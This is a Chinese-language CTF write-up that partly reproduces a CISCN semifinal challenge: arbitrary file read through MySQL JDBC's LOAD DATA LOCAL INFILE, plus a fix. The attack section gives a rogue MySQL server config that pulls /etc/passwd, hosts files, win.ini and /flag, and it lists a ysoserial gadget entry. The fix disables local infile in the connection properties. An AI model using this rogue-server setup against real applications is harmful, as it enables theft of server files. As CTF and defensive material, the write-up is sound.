ciscn 东南半决部分复现

ciscn 东南半决部分复现

jdbc 任意文件读取

Break

app.jar 起本地服务

在BOOT_INF\lib\mysql-connector-java-8.0.13.jar\mysql-connector-java-
8.0.13.jar\com\mysql\cj\protocol\a\NativeProtocol.class
sendFileToServer存在

判断allowUrlInLocalInfile是否为true开启load data local infile,

将客户端的文件插入表中(这里的客户端指 应用服务器,本地起的jar包是服务端)

本地起一个MySQL_Fake_Server https://github.com/fnmsd/MySQL_Fake_Server

config.json

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
{
    "config":{
        "ysoserialPath":"app.jar", 修改为自己的jar包路径
        "javaBinPath":"java", 
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":false 这里关掉了保存输出到文件
    },
    "fileread":{
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/flag","c:\\windows\\system32\\drivers\\etc\\hosts"] 
        选择读取的文件 这里选择读取根目录的flag文件
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"]
    }
}

只需要用到 fileread 其他这里用不到

运行server.py

这里高版本的python 会出现问题 (项目有点久远了

这里用的3.8

3.10应该也没问题

访问 对应sql服务即可

可以看到

FIX

原生的场景下可以使用预先定义的Properties将URL中的属性覆盖掉,就可以关闭本地文件读取以及URL读取了

💞使用预先定义的Properties将URL中的属性覆盖掉,就可以关闭本地文件读取、URL读取。

String driver = “com.mysql.jdbc.Driver”;
String DB_URL = “jdbc:mysql://127.0.0.1:3306/test?
user=test&maxAllowedPacket=655360&allowLoadLocalInfile=true”;
Class.forName(driver);
Properties properties = new Properties();
properties.setProperty(“allowLoadLocalInfile”,”false”);
properties.setProperty(“allowUrlInLocalInfile”,”false”);
properties.setProperty(“allowLoadLocalInfileInPath”,””);
Connection conn = DriverManager.getConnection(DB_URL,properties);

直接修改 org.example.ezawd.services\DatasourceServiceImpl.class

这里用到了

Properties properties = new Properties();
properties.setProperty(“allowLoadLocalInfile”,”false”);
properties.setProperty(“allowUrlInLocalInfile”,”false”);
properties.setProperty(“allowLoadLocalInfileInPath”,””);

PostgresDatasourceConnector postgresDatasourceConnector = new PostgresDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl()));

对应修改 获取一下配置
PostgresDatasourceConnector postgresDatasourceConnector = new PostgresDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl(),properties));

修改前

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
switch (jdbcBean.getType()) {
           case 1:
               Class.forName((String)config.get("JDBC-MYSQL"));
               String driver = "com.mysql.jdbc.Driver";
               String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?user=test&maxAllowedPacket=655360&allowLoadLocalInfile=true";
               Class.forName(driver);
               MysqlDatasourceConnector mysqlDatasourceConnector = new MysqlDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl()));
               
               if (jdbcBean.getTableName() != null) {
                   return mysqlDatasourceConnector.getTableContent(jdbcBean.getTableName());
               }

               return mysqlDatasourceConnector.getTables();
           case 2:
               Class.forName((String)config.get("JDBC-POSTGRES"));
               PostgresDatasourceConnector postgresDatasourceConnector = new PostgresDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl()));
               if (jdbcBean.getTableName() != null) {
                   return postgresDatasourceConnector.getTableContent(jdbcBean.getTableName());
               }

               return postgresDatasourceConnector.getTables();

fix后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
switch (jdbcBean.getType()) {
           case 1:
               Class.forName((String)config.get("JDBC-MYSQL"));
               String driver = "com.mysql.jdbc.Driver";
               String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?user=test&maxAllowedPacket=655360&allowLoadLocalInfile=true";
               Class.forName(driver);
               Properties properties = new Properties();
               properties.setProperty("allowLoadLocalInfile", "false");
               properties.setProperty("allowUrlInLocalInfile", "false");
               properties.setProperty("allowLoadLocalInfileInPath", "");
               
               MysqlDatasourceConnector mysqlDatasourceConnector = new MysqlDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl(),properties));
               
               if (jdbcBean.getTableName() != null) {
                   return mysqlDatasourceConnector.getTableContent(jdbcBean.getTableName());
               }

               return mysqlDatasourceConnector.getTables();
           case 2:
               Class.forName((String)config.get("JDBC-POSTGRES"));
               Properties properties2 = new Properties();
               properties2.setProperty("allowLoadLocalInfile", "false");
               properties2.setProperty("allowUrlInLocalInfile", "false");
               properties2.setProperty("allowLoadLocalInfileInPath", "");
               PostgresDatasourceConnector postgresDatasourceConnector = new PostgresDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl(),properties2));
               if (jdbcBean.getTableName() != null) {
                   return postgresDatasourceConnector.getTableContent(jdbcBean.getTableName());
               }

               return postgresDatasourceConnector.getTables();